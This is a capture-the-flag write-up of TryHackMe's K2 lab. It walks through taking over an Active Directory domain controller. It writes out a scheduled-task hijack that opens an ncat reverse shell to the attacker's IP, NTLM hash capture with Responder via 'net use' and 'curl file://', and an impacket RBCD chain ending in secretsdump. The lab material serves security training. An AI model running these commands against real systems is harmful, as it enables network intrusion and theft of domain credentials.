The Summit

K2 - Are you able to make your way through the mountain? - by hadrian3689

TryHackMe | Cyber Security TrainingTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

We stop the second machine and start the third. Our enumeration process starts all over again. We run another Nmap scan. And find several related ports to windows. We don't have a website this time either. This seems to be a pure AD machine again.

The ports include SMB, RDP, LDAP and Kerberos. After a default service and script scan, we can determine the name of the machine K2ROOTDC. Ok, we have now to compromise the root DC. We add K2ROOTDC.K2.THM to our /etc/host file.

Foothold

We use kerbrute again to enumerate possible users. And are able to spot administrator and j.smith.

kerbrute -users users.txt -password 'REDACTED' -domain k2.thm

We try to reuse the hash for the local administrator without success, but are able to log in with it for the user j.smith.

Lateral Movement

Release v2.5.7 · BloodHoundAD/SharpHoundGitHub

The first attempt to enumerate the root dc using bloodhound used SharpHound. However, I must have used it incorrectly here, at least it could not be found.

Something seems to be wrong, so let's skip it for now and see what we can discover with j.smith.

In the root directory we find the scripts' folder with a bat file that copies a file notes.txt to o.armstrong's Documents directory. A service or scheduled task could run this as o.armstrong.

Unfortunately, we cannot view the scheduled tasks

schtasks /query /fo LIST /v

If we look at the permissions we see that we have full access to script but cannot write to the file.

But we can delete and replace it.

We first try to write the notes in the scripts folder. To do this, we replace the bat and add full access permissions for o.armstrong.

Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\notes.txt C:\Scripts\notes.txt'

icacls "C:\Scripts\backup.bat" /grant o.armstrong:F

After a short time, we have the notes, but they don't get us anywhere.

We repeat the step to get the user flag and are successful.

Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\user.txt C:\Scripts\user.txt'

Now we replace it with a reverse shell using a netcat exe to not trigger the AV.

I had ncat.exe lying arround, not sure if it was from the following source.

It is not necessary to get a reverse shell to retrieveo.armstrong's hash for further escalation steps. Alternatively, the bat file can be modified directly to retrieve the hash from o.armstrong. To do this, set up a responder using sudo responder -I tun0 and write net use\10.8.211.1\share in the bat file. After a short time you will get the hash, so you can save some steps.

GitHub - int0x33/nc.exe: Netcat for windows 32/64 bitGitHub

We upload the ncat.exe to Scripts using evil-winrm

Start a listener.

And replace the .bat.

Set-Content -Path "C:\Scripts\backup.bat" -Value 'C:\Scripts\.\ncat.exe 10.8.211.1 4444 -e powershell'

Afer a short duration we receive a connection back as o.armstrong.

Now we can inspect the scheduled task.

schtasks /query /fo LIST /v

Privilege Esclatation

Next we want to use bloodhound-python to retrieve valueable information about the AD to find some exploitation path. As already mentioned we weren't successful using SharpHound.exe. We setup DNSChef first. Since we could get problems with the name server using the tool that it does not work properly, we use dnschef. DNSChef is a DNS proxy tool used for DNS spoofing, allowing users to intercept and modify DNS requests. It can be used in penetration testing to redirect traffic or simulate malicious DNS responses for specific domains.

Next we run bloodhound-python with the user j.smith passing his hash.

bloodhound-python -d k2.thm -c All -u 'j.smith' --hashes 'REDACTED:REDACTED' -dc k2.thm -ns 127.0.0.1

We see that our compromised target o.armstrong is in the group IT DIRECTOR.

By queriying for the shortest path to high value targets, we see that this group has generic write permissions on the machine.

By right clicking on the edge we see an exploitation path. For this we need the credentials of o.armstrong.

We can acutally try to get them by stealing his ntlm hash using responder. We set up resonder. The command sudo responder -I tun0 starts the Responder tool, which is used to capture and respond to network authentication requests, such as SMB and NetBIOS. By specifying the -I tun0 option, it listens for traffic on the tun0 network interface, typically used in VPN connections or tunneling, to potentially capture credentials or perform other attacks on that network segment.

sudo responder -I tun0

From this blog we get the info how to trigger a request to our responder to leak a hash.

Living off the land: stealing NetNTLM hashesSecurify website

We request the following address:

curl file://10.8.211.1/leak.leak.html

It is not necessary to get a reverse shell to retrieveo.armstrong's hash for further escalation steps. Alternatively, the bat file can be modified directly to retrieve the hash from o.armstrong. To do this, set up a responder using sudo responder -I tun0 and write net use\10.8.211.1\share in the bat file. After a short time you will get the hash, so you can save some steps.

Capture the hash...

... and crack it. We got the password for o.armstrong.

Again, shoutout to Jaxafed on discussing the following exploit chain, since the initial approach did not work properly. The following request query is provided by Jaxafed. In the end the method SAMR (Security Account Manager Remote) seems to be the problem solver.

In this exploit chain a computer account named "ATTACKERSYSTEM$" is being added to the K2.THM domain using the SAMR method with the provided credentials. The attacker then delegates permissions from "ATTACKERSYSTEM$" to "K2ROOTDC$" using the RBCD (Resource-Based Constrained Delegation) technique. Next, the attacker impersonates the "Administrator" to request a Kerberos service ticket for the "cifs" service on the domain controller. Finally, the secretsdump tool is used to extract password hashes from the domain controller using the Kerberos ticket (ccache) without needing credentials. A deep dive to RBCD exploitation can be found here:

A Practical Guide To RBCD ExploitationMedium

addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:REDACTED'

rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:REDACTED'

getST.py -spn 'cifs/K2ROOTDC.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!'

export KRB5CCNAME=Administrator.ccache

secretsdump.py -k -no-pass 'K2.THM/Administrator@k2rootdc.k2.thm'

With the extracted hash of administrator we are able to log in and retrieve the final flag.